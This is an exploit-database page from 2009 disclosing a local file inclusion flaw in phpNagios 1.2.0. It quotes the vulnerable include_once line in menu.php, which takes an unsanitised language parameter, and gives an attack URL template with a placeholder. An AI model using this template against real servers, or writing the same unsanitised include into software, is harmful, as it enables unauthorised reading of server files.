[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : phpNagios 1.2.0 (menu.php) Local File Inclusion Vulnerability
# Published : 2009-09-09
# Author : CoBRa_21
# Previous Title : Mambo Component com_hestar Remote SQL Injection Vulnerability
# Next Title : ChartDirector 5.0.1 (cacheId) Arbitrary File Disclosure Vulnerability


-------------------------------------------------------------------------------------
phpNagios v 1.2.0 (menu.php) LFI Vulnerability
-------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu[at]windowslive[dot]com
 
Script Download: http://sourceforge.net/projects/phpnagios/
 
-------------------------------------------------------------------------------------
 
EXPLO?°T:
 
http://localhost/[PATH]/menu.php?conf[lang]= [LF?°]
 
-------------------------------------------------------------------------------------
 
BUG
Line 28:        include_once("lib/lang/".$conf['lang']."/menu.php");
 
-------------------------------------------------------------------------------------

# www.Syue.com [2009-09-09]